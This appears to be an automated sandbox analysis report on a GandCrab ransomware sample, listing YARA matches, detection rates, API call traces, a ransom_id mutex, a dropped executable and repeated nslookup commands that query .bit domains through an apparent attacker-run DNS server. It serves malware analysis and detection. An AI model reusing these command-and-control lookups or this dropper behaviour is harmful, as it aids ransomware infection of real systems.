Source: Yara match	File source: 00000001.00000000.250804234.0000000000A89000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: eW1QrimJYd.exe PID: 4500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qvvfpl.exe PID: 3252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qvvfpl.exe PID: 68, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe, type: DROPPED

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: 1_2_00A86000 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,		1_2_00A86000
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: 11_2_00D76000 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,		11_2_00D76000

Source: nslookup.exe

Process created: 45

System Summary

Malicious sample detected (through community Yara rule)

Source: eW1QrimJYd.exe, type: SAMPLE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 11.0.qvvfpl.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 11.2.qvvfpl.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 24.0.qvvfpl.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 1.0.eW1QrimJYd.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 1.2.eW1QrimJYd.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 24.2.qvvfpl.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe, type: DROPPED	Matched rule: Gandcrab Payload Author: kevoreilly

Source: eW1QrimJYd.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: eW1QrimJYd.exe, type: SAMPLE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: eW1QrimJYd.exe, type: SAMPLE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 11.0.qvvfpl.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 11.0.qvvfpl.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 11.2.qvvfpl.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 11.2.qvvfpl.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 24.0.qvvfpl.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 24.0.qvvfpl.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 1.0.eW1QrimJYd.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 1.0.eW1QrimJYd.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 1.2.eW1QrimJYd.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 1.2.eW1QrimJYd.exe.a80000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 24.2.qvvfpl.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 24.2.qvvfpl.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe, type: DROPPED	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe, type: DROPPED	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: 1_2_00A87EE0		1_2_00A87EE0
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: 11_2_00D77EE0		11_2_00D77EE0

Source: eW1QrimJYd.exe	Virustotal: Detection: 82%
Source: eW1QrimJYd.exe	Metadefender: Detection: 85%
Source: eW1QrimJYd.exe	ReversingLabs: Detection: 100%

Source: eW1QrimJYd.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\eW1QrimJYd.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\eW1QrimJYd.exe "C:\Users\user\Desktop\eW1QrimJYd.exe"
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe "C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe"
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe "C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe"
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Windows\SysWOW64\nslookup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\eW1QrimJYd.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\eW1QrimJYd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@110/2@410/1

Source: C:\Users\user\Desktop\eW1QrimJYd.exe

Code function: 1_2_00A86D90 VirtualAlloc,VirtualAlloc,GetUserNameW,VirtualAlloc,GetComputerNameW,wsprintfW,VirtualAlloc,wsprintfW,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrcmpiW,wsprintfW,wsprintfW,VirtualFree,VirtualAlloc,VirtualAlloc,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,VirtualAlloc,VirtualAlloc,GetWindowsDirectoryW,GetVolumeInformationW,RegOpenKeyExW,RegQueryValueExW,GetLastError,RegCloseKey,lstrlenW,wsprintfW,lstrcatW,lstrcatW,GetModuleHandleW,GetProcAddress,lstrlenW,VirtualFree,lstrcatW,VirtualAlloc,GetDriveTypeW,lstrcatW,lstrcatW,lstrcatW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,VirtualFree,

1_2_00A86D90

Source: C:\Users\user\Desktop\eW1QrimJYd.exe

Code function: 1_2_00A87520 wsprintfW,VirtualAlloc,VirtualAlloc,VirtualAlloc,VirtualAlloc,CreateToolhelp32Snapshot,VirtualFree,Process32FirstW,lstrcmpiW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,Process32NextW,GetLastError,lstrlenW,VirtualFree,VirtualFree,FindCloseChangeNotification,VirtualFree,

1_2_00A87520

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=5432c2cfc05a5a97
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5276:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3572:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:492:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5380:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6168:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_01

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
